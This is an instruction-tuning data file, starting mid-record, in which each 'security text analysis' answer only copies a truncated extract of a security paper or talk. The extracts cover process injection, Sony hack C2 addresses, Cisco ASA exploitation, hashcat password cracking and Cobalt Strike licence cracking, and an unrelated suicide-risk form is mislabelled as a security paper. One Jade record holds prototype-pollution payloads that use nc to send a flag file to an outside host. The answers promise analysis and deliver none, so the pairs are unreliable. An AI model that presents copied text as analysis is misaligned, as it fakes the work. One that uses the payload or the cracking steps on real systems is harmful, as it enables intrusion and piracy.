directory with CreateFile . (Even the API documents told me I can't!) I then noticed something related to NTFS ADS . Finally I can create the directory by specifing the file name with an ADS like this : nu1l:$I30:$INDEX_ALLOCATION and use it to create the junction . Script can be ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nProcess Injection Techniques - Gotta Catch Them All Amit Klein, VP Security Research Itzik Kotler, CTO and co-founder Safebreach Labs About Itzik Kotler  15+ years in InfoSec  CTO & Co-Founder of SafeBreach  Presented in Black Hat, DEF CON, HITB, RSA, CCC and more.  http://www.ikotler.org About Amit Klein  28 years in InfoSec  VP Security Research Safebreach (2015-Present)  30+ Papers, dozens of advisories against high profile products  Presented in BlackHat, DefCon, HITB, NDSS, InfoCom, DSN, RSA, CertConf, Bluehat, OWASP Global, OWASP EU, AusCERT and more  http://www.securitygalore.com Why this research?  No comprehensive collection/catalog of process injection techniques  No separation of true injections from process hollowing/spawning  No categorization (allocation vs. memory write vs. execution), analysis, comparison  Update for Windows 10 (latest versions), x64 Kudos and hat-tip  Kudos to the following individuals/companies, for inventing/developing/documenting/POCing many techniques:  Adam of Hexacorn  Odzhan  EnSilo  Csaba Fitzl AKA TheEvilBit  And many others  Hat tip to EndGame for providing the first compilation of injection techniques. True process injection  True process injection  from live userspace process (malware) to live userspace process (target, benign)  In contrast to (out of scope):  Process spawning and hollowing  spawning the target process and injecting into it (especially before execution)  Pre-execution  e.g. DLL hijacking, AppCert, AppInit, LSP providers, Image File Execution Options, etc. Windows 10, x64  Windows 10  CFG (Control Flow Guard)  prevent indirect calls to non-approved addresses  CIG (Code Integrity Guard) - only allow modules signed by Microsoft/Microsoft Store/WHQL to be loaded into the process memory  x64 (vs. x86)  Calling convention  first 4 arguments in (volatile) registers: RCX, RDX, R8, R9. Invoking functions (from ROP) necessitates control over some/all these registers.  No POPA - writing ROP is more difficult (boots", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMac OS X Server Web Technologies Administration For Version 10.3 or Later 034-2350_Cvr 9/12/03 7:31 AM Page 1  Apple Computer, Inc.  2003 Apple Computer, Inc. All rights reserved. The owner or authorized user of a valid copy of Mac OS X Server software may reproduce this publication for the purpose of learning to use such software. No part of this publication may be reproduced or transmitted for commercial purposes, such as selling copies of this publication or for providing paid for support services. Every effort has been made to ensure that the information in this manual is accurate. Apple Computer, Inc., is not responsible for printing or clerical errors. Use of the keyboard Apple logo (Option-Shift-K) for commercial purposes without the prior written consent of Apple may constitute trademark infringement and unfair competition in violation of federal and state laws. Apple, the Apple logo, Mac, Mac OS, Macintosh, and Sherlock are trademarks of Apple Computer, Inc., registered in the U.S. and other countries. Adobe and PostScript are trademarks of Adobe Systems Incorporated. Java and all Java-based trademarks and logos are trademarks or registered trademarks of Sun Microsystems, Inc. in the U.S. and other countries. Netscape Navigator is a trademark of Netscape Communications Corporation. UNIX is a registered trademark in the United States and other countries, licensed exclusively through X/Open Company, Ltd. 034-2350/09-20-03 LL2350.book Page 2 Friday, August 22, 2003 2:32 PM 3 1 Contents Chapter 1 7 Web Technologies Overview 8 Key Web Components 8 Apache Web Server 8 WebDAV 8 CGI Support 8 SSL Support 8 Dynamic Content With Server-Side Includes (SSI) 9 Front-End Cache 9 Before You Begin 9 Configuring Your Web Server 9 Providing Secure Transactions 9 Setting Up Websites 10 Hosting More Than One Website 10 Understanding WebDAV 11 Understanding Multipurpose Internet Mail Extension Chapter 2 13 Managing Web Technologies 13 Setting Up Your Web Server for the First Ti", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH SMBTAR 1 \"11 Nov 1999\" \"smbtar 2.0.6\" .PP .SH NAME smbtar \\ - 直接备份SMB/CIFS共享资源到UNIX磁带设备的shell脚本 .PP .SH 总览 .PP \\fBsmbtar\\fP -s server [-p password] [-x service] [-X] [-d directory] [-u user] [-t tape] [-b blocksize] [-N filename] [-i] [-r] [-l log level] [-v] filenames .PP .SH 描述 .PP 此程序是samba套件的一部分 .PP smbtar是个在smbclient基础上建立的非常小的shell脚本用于把SMB共享资源直接写到磁带上 .PP .SH 选项 .PP .IP .IP \"\\fB-s server\\fP\" 指定提供共享资源的SMB/CIFS服务器 .IP .IP \"\\fB-x service\\fP\" 指定要联接的共享资源默认情况下就是备份 .IP .IP \"\\fB-X\\fP\" 排除模式从建立或者恢复的备份项中排除文件名 .IP .IP \"\\fB-d directory\\fP\" 在恢复 / 备份文件前改变初始化目录directory .IP .IP \"\\fB-v\\fP\" 指定用详细模式 .IP .IP \"\\fB-p password\\fP\" 指定要访问的共享资源的口令默认是none .IP .IP \"\\fB-u user\\fP\" 指定联接时的用户账号默认是UNIX登录账号 .IP .IP \"\\fB-t tape\\fP\" 指定所用的磁带设备这里可能是正常的文件或磁带设备默认是TAPE 环境变量如 果不指定的话以tar.out作为文件名 .IP .IP \"\\fB-b blocksize\\fP\" 指定块比例默认是20请查看tar (1)中的完整解释 .IP .IP \"\\fB-N filename\\fP\" 只备份比filename指定文件更新的文件可以用在记录文件中以实现增量备份 .IP .IP \"\\fB-i\\fP\" 指定增量模式tar文件只备份设定归档位的文件在对每个文件进行读取时归档位可以重新设定 .IP .IP \"\\fB-r\\fP\" 指定做恢复操作从tar备份文件中恢复文件到共享资源上 .IP .IP \"\\fB-l log level\\fP\" 记录(调试)等级这与smbclient (1)的-d参数含义相当 .IP .PP .SH 环境变量 .PP TAPE变量指定了执行写操作的默认磁带设备可以用-t选项来重设 .PP .SH 错误 .PP 从smbclient中调用tar命令及原始的tar命令与smbtar脚本有些不大相同的选项 .PP .SH 警告 .PP 基于安全性方面的站点不太喜欢用脚本来处理PC口令在共享资源接口上备份和恢复会在文件 列表上进行工作smbtar和GNU的tar一起使用非常出色但可能和其它的一些版本使用时并 不太好 .PP .SH 版本 .PP 此手册页是针对samba套件版本2.0的 .PP .SH 另见 .PP \\fBsmbclient (1)\\fP, \\fBsmb\\&.conf (5)\\fP .PP .SH 诊断 参见smbclient命令中的DIAGNOSTICS部分 .SH 作者 .PP samba软件和相关工具最初由Andrew Tridgell samba-bugs@samba.org创建samba现在由 开发组作为类似Linux内核开发采用的开放源代码计划方式来发展 .PP samba手册页最初由Karl Auer撰写它的源码已被转换成YODL(一种极好的开放源代码软件可 以在ftp://ftp.icce.rug.nl/pub/unix/处获得)格式并已由Jeremy Allison更新到samba2.0版本 .PP 请参见samba (7)查找如何获得一份完整的维护者列表以及如何提交错误报告及注解等等 .SH \"[中文版维护人]\" .B meaculpa <meaculpa@21cn.com> .SH \"[中文版最新更新]\" .B 2000/12/08 .SH \"[中国 Linux 论坛 man 手册页翻译计划]\" .BI http://cmpp.linuxforum.net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGhost in the Droid Possessing Android Applications with ParaSpectre Jeff Dileo (chaosdata) DEFCON 25 Hi! Im Jeff, and I have a problem. I like to do bad things to worse programming languages. *audience says* Hiiiiiiiiiiiiiiiiii Jeff Outline  Introduction  Motivation  Original Plan  Android Function Hooking 102  ParaSpectre  Demos  Future Work Introduction What is this about?  Injecting JRuby into Android applications to hook functionality Why should you care?  You reverse Android apps  You develop Android apps, but realize the debugging stack sucks  You like Ruby and/or REPLs $ irb irb (main):001:0> puts  this is a REPL this is a REPL => n i l irb (main):002:0> $ python Python 2.7.11 ( default , Mar 1 2016, 18:47:52) [GCC 4.2.1 Compatible Apple LLVM 6.1.0 (clang602.0.53)] on darwin Type help , copyright  , credits or license for more information . >>> print  this is also a REPL this is also a REPL >>> Motivation  Was reversing multiple complex Android apps  Including a screwy Korean chat app used primarily by Japanese people  Writing hooks for it was tedious and it was tricky to figure out what all of the nested obfuscated objects were Original Plan REPL-ize  Take the interesting functions ...and wrap them in REPLs!  REPLs are great  They give you an interactive shell  And let you poke around at stuff Android Function Hooking  LD_PRELOAD Shim to Win LD_PRELOAD:  Old-school function hooking  setprop wrap.<pkg> LD_PRELOAD=/path/to/file.so  Override dynamically linked native functions  Inject a native function to run early in app startup  Requires root access Android Function Hooking  LD_PRELOAD Example #include <dlfcn.h> #include <stdio.h> #include <unistd.h> static int (*_real_rand)(void) = NULL; __attribute__((constructor)) static void setup() { _real_rand = (int(*)(void))dlsym(RTLD_NEXT, \"rand\"); } int rand() { if(access(\".ps3mode\", F_OK) != -1 ) { return 4; } return (*_real_rand)(); } Android Function Hooking  Frida J-J-J-JavaScript! Frida:  Stomps over instruction mem", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n駭客如何弄垮企業? 從索尼影業與南韓核電廠事件說起 gasgas@chroot.org ziv_chang@trendmicro.com 2015.01.09 HITCON Freetalk 索尼影業被害事件  iThome 2014 12 05 報導  索尼影業Sony Pictures在上周一11/24遭到駭客入侵導致內部 網路及電腦全數停擺除影片及員工資料外流並傳出內部電腦資料 全數遭刪除介入調查的FBI隨後緊急警告美國業者應留意一款可執行 毀滅性網路攻擊的惡意程式資安業者對該惡意程式研究發現駭客 在正式展開攻擊的48小時前才編譯執行程式顯示在攻擊之前就已掌 握目標對象的所有網路及鎖定的目標機器  包括趨勢科技賽門鐵克卡巴斯基實驗室與Blue Coat等資安業者 都分析了FBI所提及的Destover惡意程式發現該惡意程式專門鎖定Sony Pictures熟悉其內部電腦架構除了記錄Sony內部主機名稱與IP位址 的關係還含有許多可進入共享網路的使用者名稱與密碼當滲透到 Sony網路之後惡意程式就會開始運作包括刪除使用者的檔案刪 除近端或遠端磁碟的檔案還有用來開機的主啟動磁區MBR此外 Destover中還有一個BMP桌布檔的Hacked By #GOP畫面與Sony被駭 時所出現的電腦畫面一致 2015/1/12 2 資料來源:hQp://www.ithome.com.tw/news/92853 Sony Pictures事件編年史(1) 2 2014.11.24 Sony Pictures 傳出被駭, GOPGuardians Of Peace 宣稱是他們作的 2014.12.01 FBI介入調查, 並懷疑是北韓做的 GOP釋出26.4GB的資料, 包含4864個資料夾與33880個檔案 15232個在職員工的SSN外洩 Sony Pictures事件編年史(2) 2015/1/12 2 2014.12.03 北韓外交官出面否認  GOP釋出第二批被偷資料, 33.7MB的壓縮檔案  包含了500組帳密, 主機資訊, 內部IP  伺服器的憑證資料  121組FTP帳密  公司對外使用的各種服務帳號, 包括YouTube,novell, mediataxi, inflight, fidelity, spiDR, SPIRIT, sony style family center, FEDEX, Connect, SPTI, Acron TASS, SPE Courier, Concur, SPC Press, AIM, HR Connect, AMEX Sony Picture事件編年史(3) 2 2014.12.09 北韓朝鮮通信表示駭客行為是正義的, 並否認北韓參與 2014.12.17 Sony Pictures 宣布取消 The Interview 公映 2014.12.19 FBI開記者會證實北韓是幕後主使者 2014.12.23 北韓對外網路斷光光 2014.12.24 Sony Pictures 宣布恢復 The Interview 公映 2015.01.02 美國對北韓進行新一輪的經濟制裁 攻擊SPE的惡意軟體 FBI/US-CERT公佈的資訊) 種類 數量 說明 SMB 蠕蟲 2種 透過網芳猜測密碼並植入惡意程式 監聽工具 未知 監聽網路, 監聽鍵盤, 監聽瀏覽器 輕量型後門 13種 單純回報與接收命令 代理工具 10種 內部網路連接使用 硬碟破壞工具 未知 破壞硬碟開機區域(MBR) 毀滅&清除工具 2種 刪除惡意程式並清除記錄 Destover 6種 徹底銷毀硬碟資訊, 復原無效 惡意程式中繼站 FBI/US-CERT公佈的資訊) IP 國家 Port Number 203.131.222.102 泰國 8080 217.96.33.164 波蘭 8080 88.53.215.64 義大利 8080 200.87.126.116 玻利維亞 8080 58.185.154.99 新加坡 8080 212.31.102.100 塞浦路斯 8080 208.105.226.235 美國 80 誰做的 2015/1/12 2 跟FBI持不同看法 時間: 2014.11.21-22 資料大小: 200+ GB 複製花費時間: 5 小時 換算大概 88M bit/s èèè USB 2.0 的速度 網路加碼爆料(hQp://sony.aQributed.to/) 稱北韓真的有涉案 POWERCOM , 首爾, 南韓 DreamcityMedia, 京畿道平澤市, 南韓 VITSSEN, 京畿道安養市, 南韓 HOSTWAY, 江原道春川市, 南韓 VAAN, 首爾, 南韓 個人觀點  行為大張旗鼓  又勒索金錢, 又", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJade jade jade addwith plugin is not a function options.selftruejs jsnode.line {\"__proto__\":{\"self\":\"true\",\"line\":\"222222222\"}} {\"__proto__\":{\"self\":\"true\",\"line\":\"2,jade_debug[0].filename));return 123;//\"}} {\"__proto__\":{\"self\":\"true\",\"line\":\"2,jade_debug[0].filename));return global.process.mainModule.require('child_process').exec('nc ip port </flag');//\"}}", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 密码破解和审计 这是渗透测试中最有趣的部分之一坐在后面喝杯咖啡享受密码刷屏几个小时我是hashcat 的舔狗所以本文将详细介绍如何使用hashcatJohn 是一个可选的替代方案如果通过用散列与彩虹表进行比较来破解可以使用Orphcrack但是我还不打算在本指南中详细介绍它们 --- ## Hashcat 一些有用的链接 * [FAQ](https://hashcat.net/wiki/doku.php?id=frequently_asked_questions#how_can_i_show_previously_cracked_passwords_and_output_them_in_a_specific_format_eg_emailpassword) * [命令行参数](https://hashcat.net/wiki/doku.php?id=hashcat) * [hashat 模式码](https://hashcat.net/wiki/doku.php?id=example_hashes) * [Hashview, hashcat的web前端](http://www.hashview.io/screenshots.html) Hashcat可以用GPU破解各种哈希在这些例子中最需要破解的是NTLM哈希Kerberost tickets 和其他您可能偶然发现的东西比如 Keepass 数据库其目标自然是尽量快地破解你会看到一堆垃圾密码我强烈建议搞一个牛X点的GPU这样就开心许多即使我的GTX 1060 3GB并不咋地我还是用它破解NTLM 最基本的 hashcat 攻击是基于字典意思就是为字典中的每个条目计算哈希并与要破解的哈希进行比较hashcat语法很好理解但你需要知道hashcat的各种modes的用法这些可以在上面的实用链接部分有为了快速查找我在下面列出一些在 AD 环境中最常用的 | mode | 哈希 | 描述 | | ------------ | --------------- | ------------------------------- | | 1000 | NTLM | 很常见用于一般域身份验证 | | 1100 | MsCache | 老版本的域缓存凭据 | | 2100 | MsCache v2 | 新版本的域缓存凭据 | | 3000 | LM | 很少用也是老版本仍然是NTLM的一部分| | 5500 | NetNTLMv1 / NetNTLMv1+ESS | 通过网络进行身份验证的NTLM | | 5600 | NetNTLMv2 | 通过网络进行身份验证的NTLM | | 7500 | Kerberos 5 AS-REQ Pre-Auth etype 23 | AS_REQ 是 Kerberoas 的初始用户身份认证请求 | | 13100 | Kerberos 5 TGS-REP etype 23 | TGS_REP 是票据授权服务器(TGS)对先前请求的回复 | ### 字典攻击 对字典攻击来说字典的质量是最重要的它可以很大可以覆盖很大范围这对于像 NTLM 这种破解代价很低散列很有用但是对于像 MsCacheV2 这种很难破解的散列来说您通常希望基于 OSINT 和某些假设或枚举比如密码策略得到更精炼的列表并应用规则 这是一个使用世界著名字典 rockyou 进行字典破解的例子 ```bash hashcat64.exe -a 0 -m 1000 ntlm.txt rockyou.txt ``` 这种方法的局限性和所有字典攻击一样如果字典里没有正确的密码就不能破解于是就有了基于规则的破解 ### 基于规则的破解 规则就是对单词进行不停额修改比如剪切或者扩展单词或者添加一些字母特殊字符之类的跟字典破解一样这也需要一个很大的规则列表基于规则的攻击基本上类似于字典攻击但是增加了一些对单词的修改这自然增加了我们能够破解的哈希 hashcat有一些自带的规则比如dive但是人们已经使用统计数据来尝试生成更高效的破解规则本文详细描述了一个名为 [One Rule to Rule Them All](https://www.notsosecure.com/one-rule-to-rule-them-all/) 的规则集可以从Github上下载我用这个规则已经取得了很大的成功而且统计数据证明它是非常好的如果想用更少的规则更快地破解那么 hashcat 中有很多内置的规则比如 best64.rule使用 best64 规则集y运行rockyou ```bash hashcat64.exe -a 0 -m 1000 -r ./rules/best64.rule ntlm.txt rockyou", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n想要理解整个认证过程必须要动手走一轮代码 想要理解整个认证过程必须要动手走一轮代码 想要理解整个认证过程必须要动手走一轮代码 想要理解整个认证过程必须要动手走一轮代码 想要理解整个认证过程必须要动手走一轮代码 想要理解整个认证过程必须要动手走一轮代码 0x00 前言 前几天搞好了 CS 4.1 的 key 填充但是文章一直没有捋出来周末抓了个时间捋了一捋勉强可以通 过 这里提供了 CS 4.0 的认证过程个人认为非常详细文中配备认证的流程图可以结合文中的代码注 释外加自己的 IDEA 调试可以完整理解整个过程因为 4.0 与 4.1 差了一个关键 key前期的处理方 式也多了一个步骤因此这里就只针对 4.0 版本的认证进行说明 附件中提供了 CSHook.jar 是针 对 CS 4.1 版本的并且文章中也明确提供了适用于 CS 4.1 的完整 key使用该 key 需要删除多余的步 骤直接使用 4.0 的验证 很多人拿到原版之所以没有搞破解是因为缺少了最重要的 Sleeved 解密 key 其实到了 4.X 版本 是没有办法进行\"破解\"的因为 AES 的密钥是无法进行破译 所以 Sleeved 解密 key 只能等好心人提 供 CobaltStrike 4.X 的认证如果对 Java 及密码学相关有所了解理解起来并不难但是对于它的破解来 说需要一个针对 Sleeved 模块的认证 key这个 key 是无法进行穷举的除非想不开了因此对于破 解来说与其说破解还不如说是将 key 进行补全了 0x01 准备工作 1.1必备知识 1.1.1RAS 算法之加密与签名的区别 加密和签名都是为了安全性考虑但略有不同常有人问加密和签名是用私钥还是公钥其实都是对加 密和签名的作用有所混淆简单的说加密是为了防止信息被泄露而签名是为了防止信息被篡改这 里举 2 个例子说明 第一个场景战场上B 要给 A 传递一条消息内容为某一指令 RSA 的加密过程如下 在这个过程中只有 2 次传递过程第一次是 A 传递公钥给 B第二次是 B 传递加密消息给 A即 使都被敌方截获也没有危险性因为只有A的私钥才能对消息进行解密防止了消息内容的泄露 1A 生成一对密钥公钥和私钥私钥不公开A 自己保留公钥为公开的任何人可以获取 2A 传递自己的公钥给 BB 用 A 的公钥对消息进行加密 3A 接收到 B 加密的消息利用 A 自己的私钥对消息进行解密 第二个场景A 收到 B 发的消息后需要进行回复收到 RSA 签名的过程如下 在这个过程中只有 2 次传递过程第一次是 A 传递加签的消息和消息本身给 B第二次是 B 获取 A 的公钥即使都被敌方截获也没有危险性因为只有 A 的私钥才能对消息进行签名即使知道了消 息内容也无法伪造带签名的回复给 B防止了消息内容的篡改 但是综合两个场景你会发现第一个场景虽然被截获的消息没有泄露但是可以利用截获的公 钥将假指令进行加密然后传递给 A第二个场景虽然截获的消息不能被篡改但是消息的内容可以 利用公钥验签来获得并不能防止泄露所以在实际应用中要根据情况使用也可以同时使用加密和 签名比如 A 和 B 都有一套自己的公钥和私钥当 A 要给 B 发送消息时先用 B 的公钥对消息加密 再对加密的消息使用 A 的私钥加签名达到既不泄露也不被篡改更能保证消息的安全性 总结公钥加密私钥解密私钥签名公钥验签 但是有一个要注意的是 1.1.2HMAC 消息摘要算法 MAC全称 Message Authentication Code 也称为消息认证码带密钥的Hash函数通信实体 双方使用的一种验证机制保证消息数据完整性的一种工具 在发送数据之前发送方首先使用通信双方协商好的散列函数计算其摘要值在双方共享的会话密钥作 用下由摘要值获得消息验证码之后它和数据一起被发送接收方收到报文后首先利用会话密钥 还原摘要值同时利用散列函数在本地计算所收到数据的摘要值并将这两个数据进行比对若两者相 等则报文通过认证 说白了就是计算摘要的时候需要一个秘钥 key没有秘钥 key 就无法计算 1.1.3AES 破解 AES 算法需要多长时间 以 AES-128 算法为例平均需要尝试 2127  1.7*1038 个 128bit 的随机数作为密钥进行加解密运 算方能找到正确的密钥 常言道天下武功唯快不破反之天下密码快必可破问题是那得有多快我们知道比特 币网络在全球范围内调用了非常庞大的硬件资源以达到极高的运算效率每秒钟操作的 Hash 运算 SHA-256可高达 2.5644*1019次虽然 AES 和 SHA-256 算法并不相同运算量也有所差异但我 们不妨近似地用该数据估算全球人民众志成城破解 AES 算法所需要的时间 假设 AES 的运算效率为 2.56441019  264", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# eleCTRic Cryptography, 400 points ## Description: > You came across a custom server that Dr Xernon's company eleCTRic Ltd uses. It seems to be storing some encrypted files. Can you get us the flag? ```python #!/usr/bin/python from Crypto import Random from Crypto.Cipher import AES import sys import time import binascii class AESCipher(object): def __init__(self): self.bs = 32 random = Random.new() self.key = random.read(AES.block_size) self.ctr = random.read(AES.block_size) def encrypt(self, raw): cipher = AES.new(self.key, AES.MODE_CTR, counter=lambda: self.ctr) return cipher.encrypt(raw).encode('base64').replace('\\n', '') def decrypt(self, enc): try: enc = enc.decode('base64') except binascii.Error: return None cipher = AES.new(self.key, AES.MODE_CTR, counter=lambda: self.ctr) return cipher.decrypt(enc) class Unbuffered(object): def __init__(self, stream): self.stream = stream def write(self, data): self.stream.write(data) self.stream.flush() def writelines(self, datas): self.stream.writelines(datas) self.stream.flush() def __getattr__(self, attr): return getattr(self.stream, attr) sys.stdout = Unbuffered(sys.stdout) def get_flag(): try: with open(\"flag.txt\") as f: return f.read().strip() except IOError: return \"picoCTF{xxxFAKEFLAGxxx} Something went wrong. Contact organizers.\" def welcome(): print \"Welcome to eleCTRic Ltd's Safe Crypto Storage\" print \"---------------------------------------------\" def menu(): print \"\" print \"Choices:\" print \" E[n]crypt and store file\" print \" D[e]crypt file\" print \" L[i]st files\" print \" E[x]it\" while True: choice = raw_input(\"Please choose: \") if choice in list('neix'): print \"\" return choice def do_encrypt(aes, files): filename = raw_input(\"Name of file? \") if any(x in filename for x in '._/\\\\ '): print \"Disallowed characters\" return filename += '.txt' if filename in files: if raw_input(\"Clobber previously existing file? [yN] \") != 'y': return data = raw_input(\"Data? \") files[filename] = aes.encrypt(data) print \"Share code:\" ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAn Anti-Mitigation Exploit Generation Integrating with Metasploit Framework Vince Chen Software Quality Laboratory, NCTU About me Vince Chen  MS in Computer Science and Engineering of NCTU  Software Quality Laboratory 2 About SQLab  Advisor: Prof. Shih-Kun Huang  Current members:  Ph.D student * 3  MS student * 8  Central idea:  Bug is Backdoor  Finding Zero Days  CTFCGC 3 Outline  Anti-Mitigation (ROPChain)  Exploit Generation (CRAX)  Post-Exploitation (Metasploit) 4 How do you feel? 5 If you are a  Programmer 6 Hacker Return-to-stack attack 7 Protection mechanisms - DEP 8 Return-to-libc attack 9 Protection mechanisms - ASLR 10 Return-Oriented Programming (ROP)  RET instruction sequences (gadgets)  Unrandomized segment 11 ROP Sample 12 More Complicated? 13 ROPChain 14  Generate multi payloads  Use long gadgets  Integrate with AEG Metasploit Defcon 2015 - fuckup 15  ELF 32-bit, static, NX  Re-randomize the text base Defcon 2015 - fuckup 16 Long Gadget Side Effects 17  Inter/Intra-gadget dependency problem  Unconditional jump Exploit Generation - CRAX 18  Transfer Crash input to Exploit input Single Path Concolic Execution 19  Symbolic variable (x and y)  Path constraint (x > 0)  (2x + 1< 10)  Symbolic EIP  Constraint solver CRAX 20 CRAX with ROPChain 21 Integration  Metasploit Attacker set Metasploit handler 22 Demo 23 Summary  ROPChain:  Truing complete ROP Payload API  Generate bypassing DEP and ASLR payload  Exploit Generation (CRAX):  Convert crash to anti-mitigation exploit  Post Exploitation Framework:  Integrate Metasploit  Make Post-exploit easier 24 Thank you for listening. 25", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 The Middler Reloaded Its Not Just for the Web Anymore Def Con 17 Copyright 2009 Jay Beale and Justin Searle Jay Beale and Justin Searle InGuardians and The Middler Project 2 Copyright 2008 and 2009 Jay Beale and Justin Searle The Middler  Application-Layer Rootkit  Is a next-generation man-in-the-middle tool that takes the focus beyond the raw mechanics of the protocol.  Targets the users web applications with plug-ins that are specific to each app, abusing his privilege.  Allows the attacker to modify the victims interaction with the application bi-directionally, altering his reality.  Example:  Make sure that he doesnt get to see that e-mail from his girlfriend  Send her e-mails from him, hiding them from his view of his Sent mail, and then deleting them before he sees them. 3 Copyright 2008 and 2009 Jay Beale and Justin Searle New Features Were going to demo our new features today:  Using a new protocol to put the victim in the Matrix: Voice over IP  GUI for interactive victim selection and attack  Generic session cloning tool for HTTP  App-specific plug-ins  Performance improvements  Collaboration with Sophsec / libPoison 4 Copyright 2008 and 2009 Jay Beale and Justin Searle Adding Protocols We initially targeted only applications that were accessed via HTTP. We could do some neat tricks, like hooking the onkeypress() handler for an authentication form that loaded cleartext but will send the password via SSL. The password gets sent to our server, one key at a time, while the user is still entering it! But everyone at Def Con kept telling us that we should start attacking non-web applications and protocols as well. We decided to start with voice over IP (VoIP), for reasons that will become obvious in a moment. 5 Copyright 2008 and 2009 Jay Beale and Justin Searle Screwing Around with your Phone Have you ever noticed how much SIP, the dominant Voice over IP protocol, looks like HTTP? Heres a request: 6 Copyright 2008 and 2009 Jay Beale and Justin Searle Another ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n**Authors**: < [nixawk](https://github.com/nixawk) > ---- # Cisco ASA - CVE-2016-6366 > A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute code. > The vulnerability is due to a buffer overflow in the affected code area. The vulnerability affects all versions of SNMP (versions 1, 2c, and 3) when enabled on a virtual or physical Cisco ASA device. An attacker could exploit this vulnerability by sending crafted SNMP packets to an SNMP-enabled interface on the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system. The attacker must know the SNMP community string to exploit this vulnerability. > Note: Only traffic directed to the affected system can be used to exploit this vulnerability. This vulnerability affects systems configured in routed and transparent firewall mode only and in single or multiple context mode. This vulnerability can be triggered by IPv4 traffic only. The attacker requires knowledge of the configured SNMP community string in SNMP version 1 and SNMP version 2c or a valid username and password for SNMP version 3. > Cisco has released software updates that address this vulnerability. Mitigations are listed in the Workarounds section of this advisory. ## How to login in Cisco ASA ? If you known nothing about the Cisco ASA device, please try to discovery something useful with [**nmap**](https://nmap.org/) or custom tools/methods. If snmp is enabled, we can try to crack the password with metasploit. ``` msf auxiliary(snmp_login) > set PASSWORD public PASSWORD => public msf auxiliary(snmp_login) > set RHOSTS 192.168.206.114 RHOSTS => 192.168.206.114 msf auxiliary(snmp_login) > run [+] 192.168.206.114:161 - LOGIN SUCCESSFUL: public (Access level: read-write); Proof (sysDescr.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCrisis Intervention Documentation & Suicide Risk Assessment Immediate State Suicide in progress Call 911 immediately & ascertain location Influence of drugs / alcohol If yes, list: _____________________ Potential suicide methods nearby Self harm in progress / just completed Suicidal Ideation & Intent Suicidal Thoughts: Current Past two months None Suicidal Intent: PIC asked directly if considering suicide Not asked Current Past two months None Where intent exists currently or within the past two months: Plan is detailed (when & where) Plan is vague Has decided on means Means undecided Where means are decided: Already has Easy access Difficult access Suicidal Capability Prior attempt Prior rehearsal None Details: ___________________________________________________ __________________________________________________________ Suicidal Desire Whats wrong & why now? ___________________________________ __________________________________________________________ __________________________________________________________ Why not now? (reasons for living): _____________________________ __________________________________________________________ __________________________________________________________ Who is involved? (social supports, important relationships, conflicts): Positive Relationships Strained Relationships Suicide Risk Indicators Desire Intent Current ideation Psychological pain Hopelessness Feels like a burden Feels trapped Feels intolerably lonely Attempt in progress Plans to kill self with method known Plans to kill others as well as self Expressed intent to die Preparatory behaviors Has secured means Practice with method Capability Buffers History of suicide attempts Access to firearms Exposure to death by suicide History of or current violence toward others Available means of killing self / others Currently intoxicated Substance abuse (recent / current) Acute symptoms of mental illness Recent dramatic mood change Out of touch with reality Not sleeping Aggression", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInstrumenting Point-of-Sale Malware A Case Study in Communicating Malware Analysis More Effectively Robert Wesley McGrew, Ph.D. Assistant Research Professor Department of Computer Science and Engineering Distributed Analytics & Security Institute (DASI) Mississippi State University July 13, 2014 ! ABSTRACT ! The purpose of this white paper, and the talk that accompanies it, is to promote the adoption of better practices in the publication and demonstration of malicious software (malware) analyses. For various reasons, many popular analyses of malware do not contain enough information required for a peer to replicate the research and verify results. This hurts analysts that wish to continue to work more in-depth on a sample, and reduces the value of such analyses to those who would otherwise be able to use them to learn reverse engineering and improve themselves personally. This paper and talk proposes that we borrow the concept of executable research by supplementing our written analysis with material designed to illustrate our analysis using the malware itself. Taking a step beyond traditional sandboxes to implement bespoke virtual environments and scripted instrumentation with commentary can supplement written reports in a way that makes the analysis of malware more sound and useful to others. As a case-study of this concept, an analysis of the recent high-profile point-of-sale malware, JackPOS is presented with enough information to replicate the analysis on the provided sample. The command-and-control server is included and Python-based harnesses are developed and presented that illustrate points of interest from the analysis by instrumenting the execution of the malware itself. ! INTRODUCTION ! This paper serves as a companion to a talk/demonstration given by the author on improving published malware analyses in general, and resources provided (code and configuration) that allow the reader to follow along with, reproduce, verify, and resume work from the case s", "category": "text_analysis", "source": "security_papers"}
